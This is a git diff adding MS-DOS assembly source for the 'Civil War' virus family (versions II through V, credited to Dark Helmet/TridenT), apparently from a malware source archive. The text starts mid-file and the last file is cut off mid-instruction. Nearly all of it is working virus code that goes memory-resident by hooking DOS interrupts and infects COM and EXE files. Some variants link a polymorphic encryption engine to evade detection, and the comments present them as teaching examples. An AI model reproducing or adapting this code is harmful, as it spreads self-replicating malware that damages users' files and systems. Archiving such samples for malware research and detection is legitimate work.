dx,cs:[name_off-6] + mov ax,3D02h ; open file + call do_int21h + jc close_file + push cs + pop ds + mov [handle-6],ax + mov bx,ax + + call get_date + +check_infect: push cs + pop ds + mov bx,[handle-6] ; read first 6 bytes + mov ah,3fh + mov cx,06h + lea dx,[carrier_begin-6] + call do_int21h + mov al, byte ptr [carrier_begin-6]+3 ; check initials + mov ah, byte ptr [carrier_begin-6]+4 ; 'D' and 'H' + cmp ax,[initials-6] + je save_date ; if equal already + ; infect + +get_lenght: mov ax,4200h ; file pointer begin + call move_pointer + mov ax,4202h ; file pointer end + call move_pointer + sub ax,03h ; ax = filelenght + mov [lenght_file-6],ax + + call write_jmp + call write_virus + +save_date: push cs + pop ds + mov bx,[handle-6] + mov dx,[date-6] + mov cx,[time-6] + mov ax,5701h + call do_int21h + +close_file: mov bx,[handle-6] + mov ah,03eh ; close file + call do_int21h + + mov dx,cs:[old_24h-6] ; restore int24h + mov ds,cs:[old_24h+2-6] + mov ax,2524h + call do_int21h + + jmp continu + + + + +new_24h: mov al,3 + iret + +;--------------------------------------------------------------------------- +; PROCEDURES +;--------------------------------------------------------------------------- + +move_pointer: push cs + pop ds + mov bx,[handle-6] + xor cx,cx + xor dx,dx + call do_int21h + ret + +do_int21h: pushf + call dword ptr cs:[old_21h-6] + ret + +write_jmp: push cs + pop ds + mov ax,4200h + call move_pointer + mov ah,40h + mov cx,01h + lea dx,[jump-6] + call do_int21h + mov ah,40h + mov cx,02h + lea dx,[lenght_file-6] + call do_int21h + mov ah,40h + mov cx,02h + lea dx,[initials-6] + call do_int21h + ret + +write_virus: push cs + pop ds + mov ax,4202h + call move_pointer + mov ah,40 + mov cx,len + mov dx,100 + call do_int21h + ret + +get_date: mov ax,5700h + call do_int21h + push cs + pop ds + mov [date-6],dx + mov [time-6],cx + ret + +set_int24h: mov ax,3524h + call do_int21h + mov cs:[old_24h-6],bx + mov cs:[old_24h+2-6],es + mov dx,offset new_24h-6 + push cs + pop ds + mov ax,2524h + call do_int21h + ret + +set_atribuut: mov ax,4300h ; get atribuut + mov ds,cs:[name_seg-6] + mov dx,cs:[name_off-6] + call do_int21h + and cl,0feh ; set atribuut + mov ax,4301h + call do_int21h + ret + +;--------------------------------------------------------------------------- +; DATA +;--------------------------------------------------------------------------- + +old_21h dw 00h,00h +old_24h dw 00h,00h +carrier_begin db 090h, 0cdh, 020h, 044h, 048h, 00h +text db 'Civil War II v1.1, (c) 06/03/1992 Trident/Dark Helmet, The Netherlands',00h +jump db 0e9h +name_seg dw ? +name_off dw ? +virus_segment dw ? +lenght_file dw ? +handle dw ? +date dw ? +time dw ? +initials dw 4844h +last db 090h + +Civil_war ends + end dummy + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.civil310.asm b/MSDOS/Virus.MSDOS.Unknown.civil310.asm new file mode 100644 index 00000000..8cdaa190 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.civil310.asm @@ -0,0 +1,476 @@ +;**************************************************************************** +; Civil War III, * +; * +; Assembled with Tasm 2.5 * +; (c) 1992 Dark Helmet / TridenT, The Netherlands * +; The author takes no responsibility for any damaged caused by this virus * +; * +;**************************************************************************** +; * +; Civil War... * +; * +; "For all I've seen has change my mind * +; But still the wars go on as the years go by * +; With no love for God or human rights * +; 'Cause all these dreams are swept aside * +; By bloody hands of the hypnotized * +; Who carry the cross of homicide * +; And history bears the scars of our civil war" * +; * +;**************************************************************************** + + + .Radix 16 +Civ_War Segment + Model small + Assume cs:Civ_War, ds:Civ_War, es:Civ_War + + org 100h + +lenght equ offset last - start +virus_lenght equ lenght /16d + +;****************************************************************************** +; +; A dummy file created only for the virus dropper +; +;****************************************************************************** + +dummy: db 0e9h, 00h, 00h ; Jump + infection + ; marker + +;****************************************************************************** +; +; Here starts the virus code +; +;****************************************************************************** + +start: call start_2 ; Make call to + ; push IP on stack. +start_2: pop bp ; Get IP from stack. + sub bp, offset start_2 + +check_host: cmp cs:[host_file+bp],0Ch ; Check if the host + ; file is a COM file. + jne exe_start ; Host file is an + ; EXE file. + +com_start: mov di,0100h ; Restore beginning + lea si,cs:[host_begin+bp] ; of the host file + mov cx,03h ; (first 6 bytes). + rep movsb + + push cs ; New CS on stack. + mov ax,0100h ; New IP on stack. + push ax + jmp chk_install + +exe_start: mov ax,cs:[old_cs+bp] ; Calculate new + mov bx,ax ; CS + mov ax,ds + add ax,bx + add ax,10h + push ax ; New CS on stack. + mov ax,cs:[old_ip+bp] + push ax ; New IP on stack. + + +chk_install: + push ds + push es + + mov ah,0a0h ; check if virus already + int 21h ; resident + cmp ax,0003h ; check for virus_id + je abort + +adjust_memory: push ds ; lower DS with 1 + pop ax ; paragraf + dec ax + push ax + pop ds + cmp byte ptr ds:[0000],5a ; Check if last MCB. + jne abort ; If not last MCB end. + + mov ax,ds:[0003] ; decrease memory size + sub ax,50h ; by about 1k + mov ds:[0003],ax + + sub word ptr ds:[0012],50h + +install_virus: mov bx,ax ; virus destination. + mov ax,es + add ax,bx + mov es,ax + mov cs:[v_segment+bp],es ; save virus segment + ; for hooking interrupt + push cs ; DS points to segment + pop ds ; with virus + + mov cx,lenght ; Virus lenght. + lea si,[start+bp] ; Start of virus. + lea di,es:0103h ; Where to copy virus + ; to. + rep movsb ; move virus to + ; new memory location. + +hook_int21: cli ; hook int21h + mov ax,3521h ; get old int 21h + int 21h ; vector + mov ds,cs:[v_segment+bp] + mov ds:[old_21h],bx ; old vector in memory + mov ds:[old_21h+2],es + + mov ax,ds ; INT 21, AX 2521 + mov bx,ax ; bx segment new int21 + mov dx, offset main_virus ; dx offset new int21 + xor ax,ax + mov ds,ax + mov ds:[4*21h],dx ; offset int 21h + mov ds:[4*21h+2],bx ; seggment int 21h + + sti + +abort: pop es + pop ds + retf ; continu with orginal + ; programming + + +;****************************************************************************** +; +; This part of the virus will intercept the interuptvectors +; +;****************************************************************************** + + +main_virus: + pushf + cmp ah,0a0h ; check if virus ask + jne new_21h ; for virus_id + mov ax,0003h ; returns virus_id + popf + iret + +new_21h: push ax + push bx + push cx + push dx + push ds + push es + push di + push sp + push bp + +chk_open: cmp ah,3dh ; check if a file is + je chk_com ; opened + +chk_exec: cmp ax,4b00h ; check if a file is + je chk_com ; executed + +continu: pop bp + pop sp + pop di + pop es ; recover registers + pop ds + pop dx + pop cx + pop bx + pop ax + popf + jmp dword ptr cs:[old_21h] + +;****************************************************************************** + + + + +chk_com: mov cs:[name_seg],ds ; ds:dx = filename + mov cs:[name_off],dx + + ; check if extension + cld ; is .COM + mov di,dx + push ds + pop es + mov al,'.' + repne scasb + cmp word ptr es:[di],'OC' + jne chk_exe + cmp byte ptr es:[di+2],'M' + jne continu + + jmp infect_com + +chk_exe: cmp word ptr es:[di],'XE' ; check if extension + jne continu ; is .EXE + cmp byte ptr es:[di+2],'E' + jne continu + +;****************************************************************************** +; +; This part will infect a EXE file +; +;****************************************************************************** + +infect_exe: mov cs:[host_file],0Eh ; EXE marker + call int24h + call open_file ; open file + jc close_file ; Error? + call set_atributes + call get_date ; get file date/time + call chk_infect ; check if already + ; infect + + je close_file + + mov ax,4200h ; go to filestart + call mov_point + mov ah,3fh ; read exe header + mov cx,18h + lea dx,[head_buffer] ; store header in + call do_int21h ; HEAD_BUFFER + + call EXE_inf ; call for infection + ; of EXE file + + call save_date + jmp close_file + +;****************************************************************************** +; +; This part will infect COM files +; +;****************************************************************************** + +infect_com: mov cs:[host_file],0Ch ; COM marker + call int24h + call open_file ; open file + jc close_file ; error? + call set_atributes + call get_date ; get file date/time + call chk_infect ; check if already + ; infect + + + + je close_file ; already infected + + mov ax,4200h ; get beginning of file + call mov_point + + mov ah,3fh + mov cx,03h + push cs + pop ds + lea dx,[host_begin] + call do_int21h + + + mov ax,4200h ; get file lenght + call mov_point + + mov ax,4202h + call mov_point + sub ax,03h ; subtract 3 bytes for + mov cs:[lenght_file],ax ; jump instruction + ; later + + call write_jmp ; write jmp instruction + call write_vir ; write virus + call save_date + +close_file: mov bx,cs:[handle] ; close file + mov ah,3eh + call do_int21h + +restore_int24h: mov dx,cs:[old_24h] ; restore int 24h + mov ds,cs:[old_24h+2] + mov ax,2524h + call do_int21h + jmp continu ; continu with + ; interrupt + +new_24h: mov al,3 + iret + +;****************************************************************************** +; +; Procedure's used in the virus +; +;****************************************************************************** + +int24h: push cs + pop ds + mov ax,3524h ; hook int24h + call do_int21h + mov cs:[old_24h],bx + mov cs:[old_24h+2],es + mov dx,offset new_24h + mov ax,2524h + call do_int21h + ret + +set_atributes: mov ax,4300h ; clear file + mov ds,cs:[name_seg] ; atributes + mov dx,cs:[name_off] + call do_int21h + and cl,0feh + mov ax,4301h + call do_int21h + ret + +get_date: mov ax,5700h ; get original + call do_int21h ; time and date + mov cs:[date],dx ; of file + mov cs:[time],cx + ret + +save_date: mov bx,cs:[handle] + mov dx,cs:[date] + mov cx,cs:[time] + mov ax,5701h + call do_int21h + ret + +open_file: mov ds,cs:[name_seg] ; open file + mov dx,cs:[name_off] ; with pointer to + mov ax,3d02h ; name in ds:dx + call do_int21h + mov cs:[handle],ax + mov bx,ax + ret + +chk_infect: push cs + pop ds + mov ax,4202h ; file-pointer + xor cx,cx ; to infection marker + sub cx,01h + xor dx,dx + sub dx,02h + mov bx,[handle] + call do_int21h + + mov ah,3f + mov cx,02h + lea dx,[file_id] + call do_int21h + + mov al, byte ptr cs:[file_id] + mov ah, byte ptr cs:[file_id]+1 + cmp ax,[id_marker] + ret + + +mov_point: push cs + pop ds + mov bx,cs:[handle] ; move filepointer + xor cx,cx + xor dx,dx + call cs:do_int21h + ret + + +write_jmp: push cs + pop ds + mov ax,4200h ; write JUMP + call mov_point ; instruction + mov ah,40h ; at begin of file + mov cx,01h + lea dx,cs:[jump] + call do_int21h + + mov ah,40h ; write offset + mov cx,02h ; for JUMP + lea dx,cs:[lenght_file] + call do_int21h + ret + +write_vir: push cs + pop ds + mov ax,4202h ; write actual + call mov_point ; virus at end of + mov ah,40h ; file + mov cx,lenght + mov dx,103h + call do_int21h + ret + +EXE_inf: mov ax,word ptr cs:[head_buffer+14h] ; store old IP + mov cs:[old_ip],ax + mov ax,word ptr cs:[head_buffer+16h] ; store old CS + mov cs:[old_cs],ax + +new_CS_IP: mov ax,4200h ; get filelenght + call mov_point + mov ax,4202h + call mov_point + mov bx,10h ; divide filelenght + div bx ; by 16 + sub ax,word ptr cs:[head_buffer+08h] + mov cs:[new_cs],ax ; store new CS + mov cs:[new_ip],dx ; store new IP + call write_vir ; write virus to end + ; of file +new_size: mov ax,4200h ; Get new filesize + call mov_point ; and calculate + mov ax,4202h ; PAGE and OFFSET + call mov_point ; size for in the + mov bx,0200h ; EXE buffer. + div bx + cmp dx,0000h + jne niet_nul + jmp doorgaan +niet_nul: inc ax +doorgaan: mov word ptr cs:[head_buffer+02h],dx ; new mod lengh + mov word ptr cs:[head_buffer+04h],ax ; new page lenght + mov ax,cs:[new_ip] + mov word ptr cs:[head_buffer+14h],ax ; new IP + mov ax,cs:[new_cs] + mov word ptr cs:[head_buffer+16h],ax ; new CS + + mov word ptr cs:[head_buffer+0E],ax ; new SS + mov word ptr cs:[head_buffer+10],1000 ; new SP + + mov ax,4200h + call mov_point + mov ah,40h ; write new + mov bx,cs:[handle] ; EXE header + mov cx,18h + lea dx,cs:[head_buffer] + call do_int21h + ret + +do_int21h: pushf + call dword ptr cs:[old_21h] + ret + +;****************************************************************************** +; +; D A T A +; +;****************************************************************************** + +v_name db "Civil War III v1.0, (c) Dec 1992, [ DH / TridenT] " +old_21h dw 00h,00h +old_24h dw 00h,00h +host_file db 0Ch +host_begin db 90h,0cdh,20h +jump db 0e9h +name_seg dw ? +name_off dw ? +v_segment dw ? +handle dw ? +lenght_file dw ? +date dw ? +time dw ? +head_buffer db 18 dup (?) +file_id dw 0000 +old_cs dw ? +old_ip dw ? +new_cs dw ? +new_ip dw ? +Id_Marker dw "GR" +last dw "GR" +civ_war ends + end dummy diff --git a/MSDOS/Virus.MSDOS.Unknown.civil510.asm b/MSDOS/Virus.MSDOS.Unknown.civil510.asm new file mode 100644 index 00000000..634cbdb4 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.civil510.asm @@ -0,0 +1,337 @@ +;**************************************************************************** +; Civil War V V1.0 * +; * +; Assembled with Tasm 2.5 * +; (c) Jan '93 [ Dark Helmet / TridenT ], The Netherlands * +; * +;**************************************************************************** +; * +; This is an example virus for the TPE engine. * +; We are not responsible if you use the TPE in an illegal or naughty way. * +; The TridenT Polymorpic Engine version 1.3 should be used for linking * +; with this virus. * +; * +;**************************************************************************** + + .model tiny + .radix 16 + .code + + org 100h + + extrn rnd_init:near + extrn rnd_get:near + extrn crypt:near + extrn tpe_top:near + + +len equ offset tpe_top - begin + + +dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h ; Jump + infection + ; marker + +begin: Call virus ; make call to + ; push IP on stack + +virus: pop bp ; get IP from stack. + sub bp,offset virus ; adjust IP. + +restore_host: mov di,0100h ; recover beginning + lea si,ds:[carrier_begin+bp] ; of carrier program. + mov cx,06h + rep movsb + +check_resident: mov ah,0a0h ; check if virus + int 21h ; already installed. + cmp ax,0008h + je end_virus + +adjust_memory: mov ax,cs ; start of Memory + dec ax ; Control Block + mov ds,ax + cmp byte ptr ds:[0000],5a ; check if last + ; block + jne abort ; if not last block + ; end + mov ax,ds:[0003] ; decrease memory + sub ax,200h ; by X kbyte lenght + mov ds:[0003],ax + sub word ptr ds:[0012],200h + +install_virus: call RND_init + + mov bx,ax ; es point to start + mov ax,es ; virus in memory + add ax,bx + mov es,ax + + mov cx,len ; cx = lenght virus + mov ax,ds ; restore ds + inc ax + mov ds,ax + + lea si,ds:[begin+bp] ; point to start virus + lea di,es:0100 ; point to destination + rep movsb ; copy virus in + ; memory + mov [virus_segment+bp],es ; store start virus + ; in memory + mov ax,cs ; restore es + mov es,ax + +hook_vector: cli ; no interups + mov ax,3521h ; revector int 21 + int 21h + mov ds,[virus_segment+bp] + mov old_21h-6h,bx + mov old_21h+2-6h,es + + mov dx,offset main_virus - 6h + mov ax,2521h + int 21h + sti + +abort: mov ax,cs + mov ds,ax + mov es,ax + +end_virus: mov bx,0100h ; jump to begin + jmp bx ; host file + + +;***************************************************************************** + +main_virus: pushf + cmp ah,0a0h ; check virus call + jne new_21h ; no virus call + mov ax,0008h ; ax = id + popf ; return id + iret + +new_21h: push ds ; save registers + push es + push di + push si + push ax + push bx + push cx + push dx + +check_exec: cmp ax,04b00h ; exec function? + je chk_com + +continu: pop dx ; restore registers + pop cx + pop bx + pop ax + pop si + pop di + pop es + pop ds + popf + jmp dword ptr cs:[old_21h-6] + + +chk_com: mov cs:[name_seg-6],ds + mov cs:[name_off-6],dx + cld ; check extension + mov di,dx ; for COM + push ds + pop es + mov al,'.' ; search extension + repne scasb ; check for 'COM" + cmp word ptr es:[di],'OC' ; check 'CO' + jne continu + cmp word ptr es:[di+2],'M' ; check 'M' + jne continu + +own_stack: cli + mov cs:[old_sp-6],sp + mov cs:[old_ss-6],ss + mov ax,cs + add ax,150h + mov ss,ax + mov sp,100h + sti + + call set_int24h + call set_atribuut + +open_file: mov ds,cs:[name_seg-6] + mov dx,cs:[name_off-6] + mov ax,3D02h ; open file + call do_int21h + jc close_file + + mov cs:[handle-6],ax + mov bx,ax + + call get_date + +check_infect: mov bx,cs:[handle-6] ; read first 6 bytes + mov ah,3fh + mov cx,06h + lea dx,cs:[carrier_begin-6] + call do_int21h + + push cs + pop ds + mov al, byte ptr [carrier_begin-6]+3 ; check initials + mov ah, byte ptr [carrier_begin-6]+4 ; 'D' and 'H' + cmp ax,cs:[initials-6] + je save_date ; if equal already + ; infect + +get_lenght: mov ax,4200h ; file pointer begin + call move_pointer + mov ax,4202h ; file pointer end + call move_pointer + sub ax,03h ; ax = filelenght + mov cs:[lenght_file-6],ax + + call write_jmp + call write_virus + +save_date: mov bx,cs:[handle-6] + mov dx,cs:[date-6] + mov cx,cs:[time-6] + mov ax,5701h + call do_int21h + + +close_file: mov bx,cs:[handle-6] + mov ah,03eh ; close file + call do_int21h + + mov dx,cs:[old_24h-6] ; restore int24h + mov ds,cs:[old_24h+2-6] + mov ax,2524h + call do_int21h + + +restore_stack: cli + mov sp,cs:[old_sp-6] + mov ss,cs:[old_ss-6] + sti + + + jmp continu + + + +new_24h: mov al,03h + iret + +;--------------------------------------------------------------------------- +; PROCEDURES +;--------------------------------------------------------------------------- + +move_pointer: push cs + pop ds + mov bx,[handle-6] + xor cx,cx + xor dx,dx + call do_int21h + ret + +do_int21h: pushf + call dword ptr cs:[old_21h-6] + ret + +write_jmp: mov ax,4200h ; goto begin of file + call move_pointer + + mov ah,40h ; write JMP instruction + mov cx,01h + lea dx,[jump-6] + call do_int21h + + mov ah,40h ; write JMP offset + mov cx,02h + lea dx,[lenght_file-6] + call do_int21h + + mov ah,40h ; write initials + mov cx,02h + lea dx,[initials-6] + call do_int21h + ret + +write_virus: mov ax,4202h ;goto end of file + call move_pointer + +TPE_engine: mov ax,cs ;ES points to + add ax,90h ;worksegment + mov es,ax + + push cs ;DS:DX code to encrypt + pop ds + mov dx,100h + + mov bp,[lenght_file-6] ;BP start of encryptor + add bp,103h + + mov cx,len ;lenght code to encrypt + + xor si,si ;distance encryptor/ + ;decryptor = 0 + + call rnd_get ;AX = type of + call crypt ;encryption + + mov bx,cs:[handle-6] ;write virus + mov ah,40h ;at end of file + call do_int21h + ret + +get_date: mov ax,5700h + call do_int21h + push cs + pop ds + mov [date-6],dx + mov [time-6],cx + ret + +set_int24h: mov ax,3524h ; hook int 24h + call do_int21h + mov cs:[old_24h-6],bx + mov cs:[old_24h+2-6],es + mov dx,offset new_24h-6 + push cs + pop ds + mov ax,2524h + call do_int21h + ret + +set_atribuut: mov ax,4300h ; get atribuut + mov ds,cs:[name_seg-6] + mov dx,cs:[name_off-6] + call do_int21h + and cl,0feh ; set atribuut + mov ax,4301h + call do_int21h + ret + +;--------------------------------------------------------------------------- +; DATA +;--------------------------------------------------------------------------- + +virus_name db "Civil War V v1.0, (c) Jan '92" +old_21h dw 00h,00h +old_24h dw 00h,00h +old_ss dw ? +old_sp dw ? +carrier_begin db 090h, 0cdh, 020h, 044h, 048h, 00h +jump db 0e9h +name_seg dw ? +name_off dw ? +virus_segment dw ? +lenght_file dw ? +handle dw ? +date dw ? +time dw ? +initials dw 4844h +writer db "[ DH / TridenT ]" + + end dummy diff --git a/MSDOS/Virus.MSDOS.Unknown.civil_4a.asm b/MSDOS/Virus.MSDOS.Unknown.civil_4a.asm new file mode 100644 index 00000000..5dad729f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.civil_4a.asm @@ -0,0 +1,190 @@ +;**************************************************************************** +;* Civil War IV * +;* * +;* Assembled with Tasm 2.5 * +;* * +;* (c) Jan '93 Dark Helmet, The Netherlands. * +;* The author takes no responsibilty for any damages caused by the virus * +;* * +;* Example virus with the TPE engine (TPE version 1.3). * +;* Use : TASM CIVIL_4A * +;* TLINK CIVIL_4A TPE * +;* * +;*--------------------------------------------------------------------------* +;* * +;* This virus is NOT dedicated to Sara Gordon, but to all the innocent * +;* people who are killed in Yugoslavia. * +;* * +;* The text in the virus is taken from the song Civil War (hence the name) * +;* of Guns and Roses, Use Your Illusion II, we hope they don't mind it. * +;* * +;* The first name for the virus was NAVIGATOR II, because the virus is * +;* based on the NAVIGATOR virus (also written by me, a while back), but * +;* since I decided to put the songtext in it I renamed it to Civil War IV * +;* * +;**************************************************************************** + + .model tiny + .radix 16 + .code + + extrn rnd_init:near + extrn rnd_get:near + extrn crypt:near + extrn tpe_top:near + + org 100h + +len equ offset tpe_top - begin + +Dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h + +Begin: call virus ; calculate delta offset + +Virus: pop bp + sub bp,offset virus + + mov dx,0fe00h ; DTA instellen + mov ah,1ah + int 21h + +Restore_begin: call rnd_init ; init random generator + mov di,0100h + lea si,ds:[buffer+bp] + mov cx,06h + rep movsb + +First: lea dx,[com_mask+bp] ;get first COM file + mov ah,04eh + xor cx,cx + int 21h + +Open_file: mov ax,03d02h ;open for READ/WRITE + mov dx,0fe1eh + int 21h + mov [handle+bp],ax + xchg ax,bx + +Read_date: mov ax,05700h ;store date/time for later + int 21h ;use + mov [date+bp],dx + mov [time+bp],cx + +Check_infect: mov bx,[handle+bp] ;check if initials present in + mov ah,03fh ;file + mov cx,06h + lea dx,[buffer+bp] + int 21h + + mov al,byte ptr [buffer+bp]+3 ;Compare initials + mov ah,byte ptr [buffer+bp]+4 + cmp ax,[initials+bp] + jne infect_file ;if initials not present + ;start infecting file + +Close_file: mov bx,[handle+bp] ;close file + mov ah,3eh + int 21h + +Next_file: mov ah,4fh ;get next COM file + int 21h ;in directorie + jnb open_file + jmp exit + +Infect_file: mov ax,word ptr [cs:0fe1ah] ;get lenght of file + sub ax,03h + mov [lenght+bp],ax + mov ax,04200h ;goto begin of file + call move_pointer + +Write_jump: mov ah,40h ;Write JUMP intruction + mov cx,01h + lea dx,[jump+bp] + int 21h + + mov ah,40h ;Write JUMP offset + mov cx,02h + lea dx,[lenght+bp] + int 21h + + mov ah,40 ;Write initials to check + mov cx,02h ;for infection later + lea dx,[initials+bp] + int 21h + + mov ax,4202h ; move to end of file + call move_pointer ; for infection + +;***************************************************************************** +; T P E * +;***************************************************************************** + +Encrypt: push bp ; BP = delta offset + ; push delta offset on stack + ; for later use. + + mov ax,cs ; Calculate worksegment + add ax,01000h + mov es,ax ; ES point to decrypt virus + + lea dx,[begin+bp] ; DS:DX begin encryption + + mov cx,len ; virus lenght + + mov bp,[lenght+bp] ; decryption starts at this + add bp,103h ; point + + xor si,si ; distance between decryptor + ; and encrypted code is 0 bytes + + call rnd_get ; AX = random value + call crypt ; encrypt virus + + pop bp ; BP = delta offset + ; get delta offset of stack + +;****************************************************************************** +; T P E - E N D * +;****************************************************************************** + +Write_virus: mov bx,[handle+bp] + mov ah,40h + int 21h + +Restore_date: mov ax,05701h + mov bx,[handle+bp] + mov cx,[time+bp] + mov dx,[date+bp] + int 21h + +Exit: mov bx,0100h ; jump to start program + jmp bx + +;---------------------------------------------------------------------------- + +move_pointer: mov bx,[handle+bp] + xor cx,cx + xor dx,dx + int 21h + ret + +;---------------------------------------------------------------------------- +v_name db "Civil War IV, (c) 1993 " +com_mask db "*.com",0 +handle dw ? +date dw ? +time dw ? +buffer db 090h,0cdh,020h,044h,048h,00h +initials dw 4844h +lenght dw ? +jump db 0e9h,0 +message db "For all i'v seen has changed my mind" + db "But still the wars go on as the years go by" + db "With no love of God or human rights" + db "'Cause all these dreams are swept aside" + db "By bloody hands of the hypnotized" + db "Who carry the cross of homicide" + db "And history bears the scars of our Civil Wars." +writer db "[ DH / TridenT ]",00 + + end dummy diff --git a/MSDOS/Virus.MSDOS.Unknown.civil_4b.asm b/MSDOS/Virus.MSDOS.Unknown.civil_4b.asm new file mode 100644 index 00000000..b3da73c2 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.civil_4b.asm @@ -0,0 +1,196 @@ +;**************************************************************************** +;* Civil War IV v1.1 (minor bugfix version) * +;* * +;* Assembled with Tasm 2.5 * +;* * +;* (c) 08-01-93 Dark Helmet, The Netherlands. * +;* The author takes no responsibilty for any damages caused by the virus * +;* * +;* This is a example virus with the TPE engine to teach you how to use * +;* the TPE engine. * +;* * +;*--------------------------------------------------------------------------* +;* * +;* Notes: * +;* * +;* This virus is NOT dedicated to Sara Gordon, but to all the innocent * +;* people who are killed in Yugoslavia. * +;* * +;* The text in the virus is taken from the song Civil War (hence the name) * +;* by Guns and Roses, Use Your Illusion II, we hope they don't mind it. * +;* * +;* The first name for the virus was NAVIGATOR II, because the virus is * +;* based on the NAVIGATOR virus (also written by me, a while back), but * +;* since I decided to put the songtext in it I renamed it to Civil War IV * +;* * +;* You need the TPE 1.3 engine to link this program. * * +;* * +;**************************************************************************** + + .model tiny + .radix 16 + .code + + extrn rnd_init:near + extrn rnd_get:near + extrn crypt:near + extrn tpe_top:near + + org 100h + +len equ offset tpe_top - begin + +Dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h + +Begin: call virus ; calculate delta offset + +Virus: pop bp + sub bp,offset virus + + mov dx,0fe00h ; DTA instellen + mov ah,1ah + int 21h + +Restore_begin: call rnd_init ; init random generator + mov di,0100h + lea si,ds:[buffer+bp] + mov cx,06h + rep movsb + +First: lea dx,[com_mask+bp] ;get first COM file + mov ah,04eh + xor cx,cx + int 21h + +Open_file: mov ax,03d02h ;open for READ/WRITE + mov dx,0fe1eh + int 21h + mov [handle+bp],ax + xchg ax,bx + +Read_date: mov ax,05700h ;store date/time for later + int 21h ;use + mov [date+bp],dx + mov [time+bp],cx + +Check_infect: mov bx,[handle+bp] ;check if initials present in + mov ah,03fh ;file + mov cx,06h + lea dx,[buffer+bp] + int 21h + + mov al,byte ptr [buffer+bp]+3 ;Compare initials + mov ah,byte ptr [buffer+bp]+4 + cmp ax,[initials+bp] + jne infect_file ;if initials not present + ;start infecting file + +Close_file: mov bx,[handle+bp] ;close file + mov ah,3eh + int 21h + +Next_file: mov ah,4fh ;get next COM file + int 21h ;in directorie + jnb open_file + jmp exit + +Infect_file: mov ax,word ptr [cs:0fe1ah] ;get lenght of file + sub ax,03h + mov [lenght+bp],ax + mov ax,04200h ;goto begin of file + call move_pointer + +Write_jump: mov ah,40h ;Write JUMP intruction + mov cx,01h + lea dx,[jump+bp] + int 21h + + mov ah,40h ;Write JUMP offset + mov cx,02h + lea dx,[lenght+bp] + int 21h + + mov ah,40 ;Write initials to check + mov cx,02h ;for infection later + lea dx,[initials+bp] + int 21h + + mov ax,4202h ; move to end of file + call move_pointer ; for infection + +;***************************************************************************** +; T P E * +;***************************************************************************** + +Encrypt: push bp ; BP = delta offset + ; push delta offset on stack + ; for later use. + + mov ax,cs ; Calculate worksegment + add ax,01000h + mov es,ax ; ES point to decrypt virus + + lea dx,[begin+bp] ; DS:DX begin encryption + + mov cx,len ; virus lenght + + mov bp,[lenght+bp] ; decryption starts at this + add bp,103h ; point + + xor si,si ; distance between decryptor + ; and encrypted code is 0 bytes + + call rnd_get ; AX = random value + call crypt ; encrypt virus + + pop bp ; BP = delta offset + ; get delta offset of stack + +;****************************************************************************** +; T P E - E N D * +;****************************************************************************** + +Write_virus: mov bx,[handle+bp] + mov ah,40h + int 21h + +Restore_date: mov ax,05701h + mov bx,[handle+bp] + mov cx,[time+bp] + mov dx,[date+bp] + int 21h + +Exit: mov ax,cs + mov ds,ax + mov es,ax + mov bx,0100h ; jump to start program + jmp bx + +;---------------------------------------------------------------------------- + +move_pointer: mov bx,[handle+bp] + xor cx,cx + xor dx,dx + int 21h + ret + +;---------------------------------------------------------------------------- +v_name db "Civil War IV v1.1, (c) Jan '93 " +com_mask db "*.com",0 +handle dw ? +date dw ? +time dw ? +buffer db 090h,0cdh,020h,044h,048h,00h +initials dw 4844h +lenght dw ? +jump db 0e9h,0 +message db "For all i've seen has changed my mind" + db "But still the wars go on as the years go by" + db "With no love of God or human rights" + db "'Cause all these dreams are swept aside" + db "By bloody hands of the hypnotized" + db "Who carry the cross of homicide" + db "And history bears the scars of our Civil Wars." +writer db "[ DH / TridenT ]",00 + + end dummy diff --git a/MSDOS/Virus.MSDOS.Unknown.civil_4c.asm b/MSDOS/Virus.MSDOS.Unknown.civil_4c.asm new file mode 100644 index 00000000..62c1efa2 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.civil_4c.asm @@ -0,0 +1,197 @@ +;**************************************************************************** +;* Civil War IV v1.2 * +;* * +;* Assembled with Tasm 2.5 * +;* * +;* (c) Jan '93 by Dark Helmet, The Netherlands. * +;* The author takes no responsibilty for any damages caused by the virus * +;* * +;* This is a example virus with the TPE engine for teaching you how to * +;* use the TPE engine. * +;* * +;*--------------------------------------------------------------------------* +;* * +;* Notes: * +;* * +;* This virus is NOT dedicated to Sara Gordon, but to all the innocent * +;* people who are killed in Yugoslavia. * +;* * +;* The text in the virus is taken from the song Civil War (hence the name) * +;* by Guns and Roses, Use Your Illusion II, we hope they don't mind it. * +;* * +;* The first name for the virus was NAVIGATOR II, because the virus is * +;* based on the NAVIGATOR virus (also written by me, a while back), but * +;* since I decided to put the songtext in it I renamed it to Civil War IV * +;* * +;* You need the TPE 1.3 engine to link this program. * * +;* * +;**************************************************************************** + + .model tiny + .radix 16 + .code + + extrn rnd_init:near + extrn rnd_get:near + extrn crypt:near + extrn tpe_top:near + + org 100h + +len equ offset tpe_top - begin + +Dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h + +Begin: call virus ; calculate delta offset + +Virus: pop bp + sub bp,offset virus + + mov dx,0fe00h ; DTA instellen + mov ah,1ah + int 21h + +Restore_begin: call rnd_init ; init random generator + mov di,0100h + lea si,ds:[buffer+bp] + mov cx,06h + rep movsb + +First: lea dx,[com_mask+bp] ;get first COM file + mov ah,04eh + xor cx,cx + int 21h + +Open_file: call rnd_get + mov ax,03d02h ;open for READ/WRITE + mov dx,0fe1eh + int 21h + mov [handle+bp],ax + xchg ax,bx + +Read_date: mov ax,05700h ;store date/time for later + int 21h ;use + mov [date+bp],dx + mov [time+bp],cx + +Check_infect: mov bx,[handle+bp] ;check if initials present in + mov ah,03fh ;file + mov cx,06h + lea dx,[buffer+bp] + int 21h + + mov al,byte ptr [buffer+bp]+3 ;Compare initials + mov ah,byte ptr [buffer+bp]+4 + cmp ax,[initials+bp] + jne infect_file ;if initials not present + ;start infecting file + +Close_file: mov bx,[handle+bp] ;close file + mov ah,3eh + int 21h + +Next_file: mov ah,4fh ;get next COM file + int 21h ;in directorie + jnb open_file + jmp exit + +Infect_file: mov ax,word ptr [cs:0fe1ah] 